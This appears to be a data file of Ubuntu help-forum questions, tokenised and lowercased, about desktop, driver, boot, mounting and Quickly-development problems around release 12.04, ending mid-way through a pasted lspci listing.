154138	why does n't gnome3 work even after trying all these workarounds ?	i was a huge fan of gnome-shell , much better than unity-shell , but i 'm unable to run it since a few weeks . when i try to log in with gnome-shell session , i 'm able to see only the background image . none of startup apps appear , nor top panel . if i start unity session and type in ctrl+alt+f1 terminal : user @ home-pc : ~ $ gnome-shell -- replace window manager error : unable to open x display or in gnome-terminal after : user @ home-pc : ~ $ gnome-shell -- replace segmentation fault ( core dumped ) it freezes until i type unity/gnome-panel -- replace in ctrl+alt+f1 terminal . edit vol . 2.0 : there is the solution : i found what was the problem . actually very simple , but never met this before . the ppa had two versions , first one , the normal 3.4 , but the second one was 3.5 or even higher , which does not work on ubuntu 12.04 . i 've checked mine with : gnome-shell -- version so the only thing i had to do is to select the correct version to install , then everything works fine . thanks for the help . : ) edit : i reset my gnome-shell settings following steps from here : rm -rf .gnome .gnome2 .gconf .gconfd .metacity .cache .dbus .dmrc .mission-control .thumbnails ~/.config/dconf/user ~.compiz* and right after it : gnome-shell -- display=:0 -- replace and it worked fine , even after rebooting . after that i added some ppa-s and installed some gnome-shell-extensions and gnome-tweak-tool and rebooted . after trying to login , gnome-shell crashed again , this time in terminal : user @ home-pc : ~ $ gnome-shell -- replace ( gnome-shell:4067 ) : glib-gio-error ** : settings schema 'org.gnome.desktop.a11y.magnifier ' does not contain a key named 'invert-lightness' trace/breakpoint trap ( core dumped ) so i need help again . : ( before edit : i 've tried several things : renaming `` .gconf '' in user `` home '' . display=:0 gnome-shell -- replace status : still not working gnome3 . purge fglrx : sudo sh /usr/share/ati/fglrx-uninstall.sh sudo apt-get remove -- purge fglrx fglrx_* fglrx-amdcccle* fglrx-dev* xorg-driver-fglrx sudo apt-get remove -- purge xserver-xorg-video-ati xserver-xorg-video-radeon sudo apt-get install xserver-xorg-video-ati sudo apt-get install -- reinstall libgl1-mesa-glx libgl1-mesa-dri xserver-xorg-core sudo mv /etc/x11/xorg.conf /etc/x11/xorg.conf.backup and reinstall it via graphic interface or using this . status : still not working gnome3 . purge gnome-shell : sudo apt-get purge alacarte cups-pk-helper gir1.2-accountsservice-1.0 gir1.2-caribou-1.0 gir1.2-clutter-1.0 gir1.2-cogl-1.0 gir1.2-coglpango-1.0 gir1.2-folks-0.6 gir1.2-gconf-2.0 gir1.2-gdesktopenums-3.0 gir1.2-gee-1.0 gir1.2-gjsdbus-1.0 gir1.2-gkbd-3.0 gir1.2-json-1.0 gir1.2-mutter-3.0 gir1.2-networkmanager-1.0 gir1.2-panelapplet-4.0 gir1.2-polkit-1.0 gir1.2-telepathyglib-0.12 gir1.2-telepathylogger-0.2 gir1.2-upowerglib-1.0 gir1.2-xkl-1.0 gjs gnome-applets gnome-applets-data gnome-contacts gnome-icon-theme-full gnome-panel gnome-panel-data gnome-session-fallback gnome-shell gnome-shell-common gnome-themes-standard indicator-applet-complete libcaribou-common libcaribou0 libclutter-1.0-0 libclutter-1.0-common libcogl-common libcogl-pango0 libcogl9 libgjs0c libmozjs185-1.0 libmutter0 libpanel-applet-4-0 mutter-common python-gmenu and reinstall gnome-shell : sudo apt-get install gnome-shell status : still not working gnome3 . one of my biggest mistakes : purge and reinstall all gnome* packages - does n't work , even i lost some apps , now unity and gnome-panel work fine , except gnome3 status : still not working gnome3 . reinstalling all available ubuntu packages : sudo dpkg-reconfigure -phigh -a returns : ** ( accounts-daemon:7108 ) : warning ** : failed to acquire org.freedesktop.accounts ** ( accounts-daemon:7108 ) : warning ** : could not acquire name and after 30-40 minutes the finished . status : still not working gnome3 . so i hope anybody help me , i love gnome-shell , but i 'm disabled to use it . thanks in advance . : )
154140	why does my browser display all-white ( blank ) text after installing some fonts ?	i installed a bunch of extra fonts for ubuntu and now almost nothing involving fonts is displayed in my browser .
154147	how do i enable all touchpad features using the alps driver on a dell n5110 ?	the touch pad is detected as ps/2 generic mouse . installing this driver do n't help . after using it with this : `` download that alps-dkms package and install it in /usr/src . from a terminal , navigate to /usr/src/psmouse-alps-0.10/src and then gedit alps.c in alps.c scroll down and copy the /* dell vostro 1400 */ line completely . in that line you will have to replace first 3 matches , that is , replace 0x73 , 0x02 , 0x50 with 0x73 , 0x03 , 0x50 . save the file and return to the terminal . in the terminal type dkms add -m psmouse -v alps-0.10 after this , type dkms build -m psmouse -v alps-0.10 after build is complete , install it with dkms install -m psmouse -v alps-0.10 after it installs it successfully , type rmmod psmouse & & modprobe psmouse this will reload your psmouse module . next , type xinput -- list to see whether it loaded successfully or not . if it shows alps/ps2 alps glidepoint in the xinput , than congrats . and i bet it will show as i got it working by this ! the touch pad is recognized as glidepoint ( witch is wrong ) and 2 finger scrolling is n't working . ( i 've forgot to try disable with fn+f3 , and now i installed ubuntu again so i 'll try to fix without any modified files ) how do i enable 2 finger scrolling , and adding the option to enable/disable it with fn+f3 . i 'm using ubuntu 12.04 64bit .
154151	why does the installer freeze at the moving dots ?	i plan to install ubuntu as the sole operating system on my old dell latitude 110l and the install freezes at the ubuntu starting dots - it does n't even get to the point where it asks if you want ubuntu as the sole operating system . i 've tried different usb sticks , and now two different cds . i even re-formatted the c drive on the old dell and re-installed a fresh copy of windows in case there was any interfering junk . still ca n't get past the dots . i 've done this on other computers without a problem - any advice ?
154155	why does the -- include switch in grep behave differently when both machines are on 11.10 ?	i have used the same following commands ( in xterm ) on two machines of the same ubuntu ( 11.11-64bit ) . grep `` jars2deploy '' -- include=*.xml ./* -r however , one machine a only search for xml file , as expected , while the other b totally ignored -- include switch . i have tried grep -- version , which shows grep are of the same version 2.9 as well . my question is how i can config on machine b so the same command searches .xml file .
154165	how to use quickly with c++	i wanted to know that how can i create application using c++ with quickly . recently i wanted to use pyside with it so i deleted all the files in the main folder expect init.py and it works i wanted to know i paste all my files there that i have worked with qt creator c++ will it work . if not tell me other ways . i seriously want to use c++ as it is more powerful and easy ( at least for me ) then python
154167	how to add widgets on gui developed with glade ?	i am using quickly and glade for the first time . i want to add certain widgets such as label and buttons on viewport via python code . is it possible ?
154180	how to mount a new drive on startup	i have recently installed a new hard drive to my ubuntu 10.0.4 box . i used system - > administration - > disk utils to format the disk ( ext4 file type ) - but did not create a partition ( is this advisable ? ) . i have manually mounted the drive as /mydata . i want to have the machine automatically mount the device on startup/reboot . how may i do this ? [ [ update ] ] this is the output from running sudo fdisk -l on my system : disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000858bf device boot start end blocks id system /dev/sda1 * 1 59334 476595200 83 linux /dev/sda2 59334 60802 11789313 5 extended /dev/sda5 59334 60802 11789312 82 linux swap / solaris disk /dev/sdb : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/sdb does n't contain a valid partition table disk /dev/sdc : 16.0 gb , 16026435072 bytes 254 heads , 63 sectors/track , 1956 cylinders units = cylinders of 16002 * 512 = 8193024 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sdc1 1 1955 15641929 c w95 fat32 ( lba )
154181	display and edit text and images in a quickly app	i need to be able to display images and text ( images resizable and text editable ) . i was thinking maybe a html type thing could do this . for a really bad example like how a word processor works . typing and editing text and pasting and editing images . thanks in advance , sorry for the impossible ( to me ) task . edit : i would also like to be able to save this somehow .
154187	need to install ethernet firmware for dell poweredge 2650 integrated bcm5703 nic	i have a dell poweredge 2650 and i 'm trying to install the ethernet firmware/driver . i found this page but i ca n't figure out how to install it . their is n't a loader.conf and i would like to avoid modding the kernel . i am using 12.04 server .
154195	unable to click in windows install of 12.04	i just installed ubuntu 12.04 through windows in order to try it out . my mouse can move ( real choppy at first , but smooths out ) but can never click . keyboard also unresponsive . both are wireless , usb and work fine in windows . any solutions ? will they work in a full install ? thanks !
154199	how do i install the riched20 and riched30 windows packages in wine ?	when i tried installing riched20 and riched30 on my system it throws this error sha1sum mismatch ! rename /home/fanyam/.cache/winetricks/riched20/q249973i.exe and try again . what am i supposed to do ? i need these packages to install microsoft office .
154208	ca n't install ubuntu , continue button doesnt work	i have a laptop without an internal hard drive and i 'm struggling to make it work from a usb drive . i have used universal-usb-installer-1.9.0.1 to install ubuntu onto my usb drive . i specified a 250 mb persistent file . the system boots and it all works fine , but i ca n't really save any changes or even access the usb drive , ca n't create folders or copy files to it , and ca n't connect to the internet . when i try to access the internet , and enter the password of the access point , it tries to connect and than says `` network disconnected '' and asks for the password again . i know the password i am inputting is correct . ( it also fails to save the password . ) if i restart it , all my changes like the desktop wallpaper and the wifi configuration are gone . i figured i need to use the install shortcut and install it permanently onto the usb drive , but when i try to do that , i choose my language and get stuck at the second screen with check boxes and stuff . on this screen , the continue button does n't work -- i ca n't press it . i figured it does n't want to install onto the same drive so i tried to install it from one usb drive to another . i still could n't get past the second screen for the same reason . i tried to use all the disk management utilities and format the second drive but nothing i did had any effect .
154209	changing the menu bar font	so , i 'm already using ubuntu tweak to change the font of my ui . there 's options for everything there except for the bold title in the menu bar . it 's still set to ( what i assume is ) ubuntu bold , and i 'd like to change it so that it 's consistent with all my other fonts .
154213	sshfs mount does not work on startup using fstab	while i am able to mount a folder from a remote server using mount folder the entry in fstab is giving connection reset by peer : i have the following in my fstab sshfs # username @ remote : /folder/ folder fuse defaults , idmap=user 0 0 i have also configure trusted relationship between the remote server and the origin using public keys . and i am able to do ssh remote and authenticate without using a password . also , if i log in on the origin machine and use : mount folder the folder mounts succesfully . any suggestions ? origin distro : 12.04 remote server : 11.10
154216	why do important system processes exhibit lower valued priorities ?	i 'm still learning about linux . as a linux distro , ubuntu is blessed with the ability to multi-task , the concurrent execution of programs . and these programs have processes , taking up their chunk of the system resources as necessary . process scheduling allows the execution of processes by priorities , so that the higher valued priorities execute more often that the lower valued priorities . but it is a surprise to me that the very important processes actually exhibit lower valued priorities . why is this the case ? what are the benefits ?
154219	which framework/toolkit for modern unity applications ?	i want to code some applications for ubuntu ( no other platforms ) , but which gui-toolkit would be the `` official '' one ... in the past ( gnome ) gtk+ was my choice , but afaik unity uses nux . i do n't want to use these standard buttons and `` old style ui '' . qt would be great for kde but what 's the latest `` unity '' toolkit suggestion ? ps : programming language would be c/c++ or python .
154220	permission denied error for running command on ubuntu	cd ~/mosesdecoder/sample-models ~/mosesdecoder/bin/moses -f phrase-model/moses.ini < phrase-model/in > out iâm having an issue running this on the command line it gives me a permission denied error , is there anyway around it ? i tried adding sudo in front but that did n't help , i 'm a novice user trying to run a program on the command line and i tried doing it through the root level access but i am unable to locate this directory that way because it tries to do everything in the root directory .
154222	four partitions on windows 7	i 've just made a bootable usb on windows7 , and now i want to replace my windows7 with ubuntu . when i choose the option replace windows 7 with ubuntu , i need to select a drive . since i have only one drive in my desktop , i must use it . but on my windows the drive is partitioned into a c and d drive ( both 500gb ) . i put all my files on the d drive , so i can still use them in ubuntu . my intention is to install ubuntu on the c drive from windows , but when i click on advanced partitioning tool , i see that there are four partitions : sda1 ( ntfs ) : 14.7 gb , sda2 ( ntfs ) : 104.9 mb , sda3 ( ntfs ) : 492.7 gb , sda4 ( ntfs ) : 492.7 gb my problem is that i do n't really know what the first two partitions are , and which one is the c : / drive from windows . i guess it is the third , but i must be sure because otherwise all my data is lost . what exactly do i have to do to just install ubuntu on one partition and keep another partition with my files ( the d in windows ) ? also i do n't really know on what type of filesystem ubuntu has to be installed on ( fat , ntfs , ext , .. ) . the desktop that i 'm working on is a acer aspire ax3900 . thanks ( and sorry for my bad english ) .
154223	ca n't upgrade ubuntu server from 10.04 lts to 12.04 lts	i 'm trying to upgrade my 10.04 server using do-release-upgrade , but it keeps saying there is no new version available . if i change the prompt config in /etc/update-manager/release-upgrades to normal , i am able to upgrade to 10.10 though , but i do n't want to perform 4 separate upgrades in order to reach the new lts .
154231	why do n't the fn-hotkeys on my asus n56 laptop work ?	i have a problem working with the fn hotkeys on my brand new laptop asus . i can not change my volume , screen brightness , keyboard back light and other minor functions . i have tested many possible solutions , but without any sucess . thank you ! i aprecciate some help !
154242	why does booting from live-usb give me a 'cant find vesamenu.c32 ' error ?	ca n't boot live-usb . error : 'cant find vesamenu.c32 ' . do i have to download and install on usb pen again ?
154243	how do i disable user account switching in gnome 3 ?	is there any way to disable the `` switch user account '' menu on the top bar ? i 'm using gnome 3 on precise pangolin . thanks in advance
154245	how to find out the command to add program to session startup programs ?	i 'd like to add empathy to the list of programs to start up when starting an session , i looked at this page : https : //help.ubuntu.com/community/addingprogramtosessionstartup but i do n't think this is adapted to 12.04 ( see section `` how to find the appropriate startup command '' ) so , how can i find out the command for a program to add to startup programs ?
154247	how do i preserve the programs i install and changes i make to a liveusb session ?	i have made a liveusb ubuntu version 12 , booted it up . works fine . the problem is , i 'm not allowed to install it onto someone else 's computer , but i 'm fine with a usb . i know that if i install any kind of program onto it , all changes will be erased after i shutdown/restart . my question : is there any way of keeping programs/changes you 've made on a liveusb ?
154250	is there a difference between the 'acer-wmi ' and 'acer_wmi ' drivers ?	is there a difference between drivers acer-wmi , and acer_wmi ? sometimes on my computer i see the driver acer-wmi and acer_wmi , they are also both quoted in forums interchangeably .
154251	how do i set up a python development environment ?	ok so i have decided to delve into the realms of casual coding and i have been told python is a great language for beginners like myself . i know ( not really sure though ) the python interpreter is included by default in ubuntu but plan to install the idle gui as my python gui . what else do i need to do to make my 12.04 set-up a true python development environment ?
154255	how can i tell if i am out of inotify watches ?	i use an application that consumes inotify watches . i 've already set fs.inotify.max_user_watches=32768 in /etc/sysctl.conf but last night the application stopped indexing unless i ran it manually , which leads me to suspect i am out of watches . since i do n't know what the trade off is when i increase this number ( does it consume more ram ? ) , i do n't know if i should just increase this number , so i 'd like to know if there 's a way i can tell if it 's using all these watches and what the tradeoffs might be for increasing it .
154257	why am i getting autoconf ac_* macro errors ?	i am trying to build this language modelling toolkit but i run into this problem when trying to get it set up . i am trying to understand what the error means , and what i should do to fix it , i dont understand because i had just installed the auto tools but now i am getting this problem and it seems to be one of them . user @ wh : ~/irstlm-5.70.04 $ ./regenerate-makefiles.sh calling calling /usr/bin/aclocal ... calling /usr/bin/autoconf ... configure.in:18 : error : possibly undefined macro : ac_disable_shared if this token and others are legitimate , please use m4_pattern_allow . see the autoconf documentation . configure.in:19 : error : possibly undefined macro : ac_prog_libtool autoconf failed
154259	how to add dependencies to a quickly generated .deb installer ?	i need extra packages for my app ( done with quickly ) . when i run : quickly package how can i set them ? thanks in advance !
154270	move firefox 13 menu bar to global menu bar in unity	i am using firefox 13 in ubuntu 12.04 . how can i access the firefox 13 menu in unity 's global menu bar ? i am using to the whole firefox menu appearing when i hold down the alt key .
154271	how do i start the postgresql service upon boot ?	i am running postgresql ( v 8.4 ) on ubuntu 10.0.4 . the pg service currently starts on reboot ( after i installed pg on my machine ) , however , i want the service to use a new data directory . currently , after a reboot , i have to : stop the currently running pg service manually type : /usr/local/pgsql/bin/pg_ctl start -d /my/preffered/data/directory -l /usr/local/pgsql/data/logfile which file do i need to edit to ensure that i always have the service using the correct data folder ?
154278	how to connect samsung tab 2 10.1 to ubuntu 12.04 ?	i have this galaxy tab 2 10.1 tablet and when connecting it to my system through usb i get this error message : unable to mount gt-p5113 error initializing camera : -53 : could not claim the usb device i have usb debugging enabled and when disabled i get the same error message . any ideas on how to fix this ?
154284	how to install rosegarden freedom , and linux multimedia studio properly etc . ?	how do i install this rosegarden freedom ? i downloaded it but all i got was files and i do n't know how to handle them . where did disappear linux multimedia studio lmms which i downloaded but it did not appear on the launcher ? neither can not i find lmms with terminal . why there 's a red drop on the launcher which says waiting to install and what should i do ? i downloaded qsynth and it appears when clicking the red drop but still there appears text waiting to install . thank you
154286	how to add sub menus in appindicators ?	i am using this code to try to add submenus in appindicator # ! /usr/bin/env python import gobject import gtk import appindicator def clean_quit ( w ) : print `` in quit '' gtk.main_quit ( ) if __name__ == `` __main__ '' : ind = appindicator.indicator ( `` example-simple-client '' , `` indicator-messages '' , appindicator.category_application_status ) ind.set_status ( appindicator.status_active ) ind.set_attention_icon ( `` indicator-messages-new '' ) # create a menu menu = gtk.menu ( ) listmenu=gtk.menu ( ) listitems=gtk.menuitem ( `` show list '' ) listitems.set_submenu ( listmenu ) inews = gtk.menuitem ( `` import '' ) listmenu.append ( inews ) menu.append ( listitems ) listitems.show ( ) # create some menu_items=gtk.menuitem ( `` quit '' ) menu.append ( menu_items ) menu_items.connect ( `` activate '' , clean_quit ) menu_items.show ( ) ind.set_menu ( menu ) gtk.main ( ) but it is not coming properly what is wrong in this code
154297	how to make update manager update programs i 've installed ?	i have installed chromium , lightspark and gnash on my ubuntu system . i want to make update manager update these programs without asking me , and always search to find updates .
154299	why is n't startup disk creator working in 12.04 ?	i 'm trying to create a bootable usb stick ( 7.5g ) for ubuntu 12.04 ( x86_64 ) from another ubuntu 12.04 x86_64 pc . i downloaded the ubuntu 12.04 lts `` precise pangolin '' - release amd64 ( 20120425 ) . when i run make startup disk , i selected the downloaded release . the drive shows up with a capacity of 7.5gb and a blank space under `` free space '' . i have tried using the `` erase disk '' button , which seems to erase the disk . the problem is that the options below the `` disk to use '' section are grayed out . the `` make startup disk '' is colored dull orange , while the source disc image and device to use are bright orange . the `` make startup disk '' button does n't do anything when i click it . the only working buttons are `` other ... '' , `` erase disk '' , and `` close '' . upon using other button to select the iso , it allows to select the iso but it does n't load and the `` source disk image '' field remains empty .
154302	how do i install a tar.gz file ?	i have aircrack.tar.gz file in my disk drive ( not installed ) . i wan na install it via terminal . please let me know how to install this file. # i got . manpages packages patches scripts src test authors changelog common.mak evalrev installing license license.openssl makefile patchchk readme version . . what cel i do now please give me ful process .
154307	run a script from django view as root without asking for password	i need to run a script ( text.sh ) that needs sudo , without inputting password , for example : sudo apt-get update > > /home/derp/test.txt i have modified my sudoers file like this : # this file must be edited with the 'visudo ' command as root . # # please consider adding local content in /etc/sudoers.d/ instead of # directly modifying this file . # # see the man page for details on how to write a sudoers file . # defaults env_reset defaults secure_path= '' /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin '' # host alias specification # user alias specification # cmnd alias specification # user privilege specification root all= ( all : all ) all # members of the admin group may gain root privileges % admin all= ( all ) all # allow members of group sudo to execute any command % sudo all= ( all ) all pedro all= ( all ) nopasswd : /home/pedro/desktop/scripts/test.sh # see sudoers ( 5 ) for more information on `` # include '' directives : # includedir /etc/sudoers.d if i modify that script to become : time the output is : real 0m0.000s user 0m0.000s sys 0m0.000s as it should . i really do n't know what else to do ... the script is called because i get the password prompt in the console , so i do n't think it is a django or python problem.. -- -- -- edit -- -- - apprently you need to specify the sudo in the python call , like this : subprocess.call ( [ 'sudo ' , `` /your/script.sh '' ] ) and you can leave it out of the script itself . so it is fixed .
154313	how do i install realplayer to download flv files ?	i need to be able to download .flv ( flash video ) , and i know that the program `` real player '' can easily do that . how can i install it ? i cant find the installer anywhere .
154323	why is comboboxtext giving me a `` no attribute '' error ?	i 'm trying to add a text combo box into my app . i 've created in and populated the list but when i i try to print out the active text i get an error . here 's the part of the code in question : def on_netif_changed ( self , widget ) : netif = widget.gtk_combo_box_text_get_active_text ( ) print netif and the error i get : traceback ( most recent call last ) : file `` /home/boywithaxe/developer/quickly/broadcast/broadcast/broadcastwindow.py '' , line 44 , in on_netif_changed netif = widget.gtk_combo_box_text_get_active_text ( ) attributeerror : 'comboboxtext ' object has no attribute 'gtk_combo_box_text_get_active_text' i 'm a bit at a loss here , i 've no problem betting text from text boxes , but this seems a completely different issue . i tried rtfming but came up short . i would appreciate any suggestions .
154325	if i want to dual-boot ubuntu with another os , what partitioning method should i use ?	i have ubuntu running as a vm in virtualbox at the moment , but in the future , if i want to dual-boot it with windows or another os installed on my hard-drive , what partitioning method should i use to make room for it ? 1 ) manually partition my hard drive via disk management in windows ( or the equivalent in another os ) , making appropriate room for the main partition upon which ubuntu will be installed and swap space ; 2 ) partition via the ubuntu installer options ; 3 ) use gparted or another free tool like it . i am uncertain as to why i would want to use one over the other . lastly , am i correct to think that it would be the acme of foolishness to try to partition drives within a virtual machine ( since that partitioning would be inherently limited to the limitations set upon it by the virtualization software , e.g. , virtualbox ) ? thanks ! p.s . oh , and i am also planning on not modifying the mbr of windows if i ever do dual-boot with ubuntu , using instead a piece of free software ( like easybcd or something ) to avoid the headaches of grub being overwritten by a windows update .
154327	how do i prepare for installing ubuntu from windows ( wubi ) ?	if i were to install ubuntu via the method stated here ; http : //www.ubuntu.com/download/desktop/windows-installer will i need to download/install anything else first ? do i simply select `` boot ubuntu '' and then go about my business ? will my hdd need partitioning beforehand ? if i save files while running ubuntu where do they go when i decide to boot windows instead ? just trying to figure out the best way to use ubuntu without removing the windows os ( :
154331	can wubi install the 64-bit version of ubuntu ?	i am trying to develop for android on ubuntu but it requires a 64 bit version . can wubi install a 64 bit version or do i need to do a regular install ?
154347	what can i do when the network manager tray/panel icon stops responding ?	sometimes the networking program ( controlled via drop down menu from the wireless symbol in the top right of the screen ) hangs on my laptop ( asus u36jc ) . i have tried `` sudo killall networkmanager '' , which did n't seem to affect it . what is the name of this program ? how would you kill and/or restart it when it no longer responds ? thanks in advance .
154350	is there a way to make launcher read icon from usb ?	gnome in 10.04 , and nautilus still today under 12.04 , read the autorun.inf file from my usb drive and display correctly the ( .ico ) icon for the given drive . however , unity 's launcher shows a generic icon . how can i change that ? is it possible to have it read the .ico ( or , say , a .png ) from within the drive ? or otherwise assign a specific icon to a particular device ? -- i.e. , i 'm not interested in substituting one generic icon for another .
154354	how to add vte terminal widget in gtk3 ?	i 'm trying to add vte widget in my application and the examples i 've found use .fork_command ( ) to execute a command in that widget . but according to http : //developer.gnome.org/vte/0.26/vteterminal.html # vte-terminal-fork-command it was deprecated and it 's recommended to use fork_command_full ( ) . which needs eight mandatory arguments . have n't they heard the `` defaults '' word ? i 've been able to construct lines that work somehow : pty_flags = vte.ptyflags ( 0 ) terminal.fork_command_full ( pty_flags , `` /home/int '' , ( `` /bin/bash '' , ) , `` '' , 0 , none , none ) yes , i know about the enums , i just hope that i 'm doing this completely wrong and there is a much easier way . do you know any ? p.s . i 'm using quickly with the default ubuntu-application template . p.p.s . the import line is from gi.repository import vte as vte
154356	can i edit the amnesia and psychonauts launchers to run bumblebee ?	how do i customize the following game launchers to use bumblebee to run these games with my nvidia card ? the terminal command is : optirun game the games are amnesia the dark descent and psychonauts , both installed through ubuntu sotware centre . in the old days you simply right-clicked on the launcher and edited the preferences .
154363	c++ application on kubuntu	im looking to develop myself an application for my kubuntu machine . basically a tool kit for stuff i use all the time . i have looked at the qt framework but cant find any really good guides for it adeeveloping with it ... or if you could suggest anything else to develop on kubuntu . have looked at the quickly framework aswell but is that just for gnome or unity on normal ubuntu ... . ? i have done some c++ before at uni so should pick it up reasonably quickly . just not sure where to start with linux development . thanks bill
154364	booting ubuntu 12.04 from external esata disk	this is my system topology : disk # 1 ( sata internal ) c : d : ( windows 7 ultimate ) disk # 2 ( sata internal ) e : ( windows backup ) disk # 3 ( esata external ) h : i : ( other windows data ) /dev/sdc3 linux swap /dev/sdc4 extended partition /dev/sdc5 linux / so , i originally had there ubuntu 8.1 from years ago but never got to use it . now i used the ubuntu 12.04 live cd to install on that same location ( that live cd takes a century to boot on a 6gb intel i7 system ... ) . the installation went fine , i selected it to install on /dev/sdc5 but it never asked me for any boot stuff , where i wanted to install grub or whatever it is that it uses nowaways ( i come from the lilo days when it always worked : - ) so , yet again i ca n't access my new linux installation . i have to wait a century to boot the `` live '' cd and it allows me to see my new installation but i ca n't do anything with it . i tried the approach of this blog post . copied the linux.bin of /dev/sdc5 into c : and used the bcdedit steps to declare the new os . so when i boot i see the windows boot menu and select linux and after than i only get a black screen with a blinking cursor on the upper left . i can boot into windows though . so , perhaps it did n't install the boot code on /dev/sdc5 ? i used this setup years ago booting from windows with a bin file : dd if=/dev/sdc5 of=/mnt/share/c/linux.bin bs=512 count=1 i am very reluctant to run grub because years ago i did and it wiped out my windows boot sector and took quite some effort to recover it and be able to boot windows again . i have been trying to install grub on a blank usb stick but i ca n't find anything clear enough . my system does not have a floppy . so can someone give me some ideas about how to get control of my ubuntu 12.04 installation ?
154366	hercules dj console mk4	i have a hercules dj console mk4 at home and i would like to use it in ubuntu because i prefer this over windows . i know it is n't officially supported but does anyone know any method to do this ? i 'm in ubuntu 12.04 greets
154368	can not mount usb memory in ubuntu 12.04	over the night i downloaded and installed ubuntu 12.04 desktop . since i am yet unable to access my actual installation i boot the live cd from which i installed ( takes ages in a fast system ) . i noticed that when i insert the usb stick ( 1gb ) into the usb slot , it appears listed on the window . however when i double click on it or select mount or open or whatever it just does nothing . no error message , no fiels are visible , nothing , it simply leaves me in the dark . how do i know what 's the name of the device ? how can i mount it ? why does n't it mount it on my command using the gui ?
154372	how to implement event changed event on entity object python/quickly	i start to develop a test application to experiment button clicks , window 's title change and other widgets use . on button objects it 's easy to make event `` clicked '' to work , in to window class and declare on_button_clicked ( ... ) and works , no more its needed . def on_button1_clicked ( self , button ) : print `` clicked exit '' gtk.main_quit ( ) but whit the entry object i try to make some similar to the event `` changed '' whitout success . do any one have a clue about how to handle events on this an other type of object ( entry , comoboxtext , radiobutton , etc ) on python/quicly i try some like this but did n't work def on_entry1_changed ( self , entry ) : self.ui.prototipo1_window.set_title ( self.ui.entry1.get_text ( ) ) any one ? thank you a lot by your help .
154373	use primary-toolbar with mono	i am trying to create an application for the ubuntu app contest . and i defined image of the design , but i am having problems with it . principally with the primary-toolbar design , so it would look like ubuntu software center of even rhythmbox . so my question is . how can i use this visual with monodevelop and the mono/c # language ?
154374	configuration to point an x tty to a separate system ?	specifically , i have an ubuntu 10.04 system with a headless ubuntu 12.04 virtual machine , and i 'm looking for a way to have it set up so pressing ctrl+alt+f8 will take me into another x client which is connected to an x server on the vm ( with gdm appropriately displayed at startup , etc. ) . as in , my startup script should spin up the headless machine and then immediately perform a startx pointed at the vm .
154377	how to disable auto-maximize windows in gnome ?	each time i open any application , it zooms to fill-up the entire desktop and so i am always forced to use `` unmaximize '' using alt+space menu . this is a feature that i must disable at any cost . please help , i have tried everything discussed so far .
154378	how do i keep my broadcom wireless card connected ?	i brought a samsung netbook with a broadcom wireless adapter bcm4313 [ 14e4:4727 ] . i did a clean install of ubuntu precise pangolin 12.04 lts and my issue with it is that i keep on being disconnected every few minutes then it reconnects itself as fast as it had been disconnected . i tried the sta driver and the open source driver ; both of them gave me the same results . the comannd lspci -nn | grep -ie eth -e net | awk ' { print $ 1 } ' | xargs -n 1 lspci -vvnns – banjo gave me this : paer76 @ paer76-305u1a : ~ $ lspci -nn & & grep -ie eth -e net & & awk ' { print $ 1 } ' & & xargs -n 1 lspci -vvnns – banjo 00:00.0 host bridge [ 0600 ] : advanced micro devices [ amd ] family 14h processor root complex [ 1022:1510 ] 00:01.0 vga compatible controller [ 0300 ] : advanced micro devices [ amd ] nee ati wrestler [ radeon hd 6320 ] [ 1002:9806 ] 00:01.1 audio device [ 0403 ] : advanced micro devices [ amd ] nee ati wrestler hdmi audio [ radeon hd 6250/6310 ] [ 1002:1314 ] 00:04.0 pci bridge [ 0604 ] : advanced micro devices [ amd ] family 14h processor root port [ 1022:1512 ] 00:11.0 sata controller [ 0106 ] : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 sata controller [ ahci mode ] [ 1002:4391 ] 00:12.0 usb controller [ 0c03 ] : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 usb ohci0 controller [ 1002:4397 ] 00:12.2 usb controller [ 0c03 ] : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 usb ehci controller [ 1002:4396 ] 00:13.0 usb controller [ 0c03 ] : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 usb ohci0 controller [ 1002:4397 ] 00:13.2 usb controller [ 0c03 ] : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 usb ehci controller [ 1002:4396 ] 00:14.0 smbus [ 0c05 ] : advanced micro devices [ amd ] nee ati sbx00 smbus controller [ 1002:4385 ] ( rev 42 ) 00:14.2 audio device [ 0403 ] : advanced micro devices [ amd ] nee ati sbx00 azalia ( intel hda ) [ 1002:4383 ] ( rev 40 ) 00:14.3 isa bridge [ 0601 ] : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 lpc host controller [ 1002:439d ] ( rev 40 ) 00:14.4 pci bridge [ 0604 ] : advanced micro devices [ amd ] nee ati sbx00 pci to pci bridge [ 1002:4384 ] ( rev 40 ) 00:14.5 usb controller [ 0c03 ] : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 usb ohci2 controller [ 1002:4399 ] 00:15.0 pci bridge [ 0604 ] : advanced micro devices [ amd ] nee ati sb700/sb800/sb900 pci to pci bridge ( pcie port 0 ) [ 1002:43a0 ] 00:15.1 pci bridge [ 0604 ] : advanced micro devices [ amd ] nee ati sb700/sb800/sb900 pci to pci bridge ( pcie port 1 ) [ 1002:43a1 ] 00:15.2 pci bridge [ 0604 ] : advanced micro devices [ amd ] nee ati sb900 pci to pci bridge ( pcie port 2 ) [ 1002:43a2 ] 00:15.3 pci bridge [ 0604 ] : advanced micro devices [ amd ] nee ati sb900 pci to pci bridge ( pcie port 3 ) [ 1002:43a3 ] 00:18.0 host bridge [ 0600 ] : advanced micro devices [ amd ] family 12h/14h processor function 0 [ 1022:1700 ] ( rev 43 ) 00:18.1 host bridge [ 0600 ] : advanced micro devices [ amd ] family 12h/14h 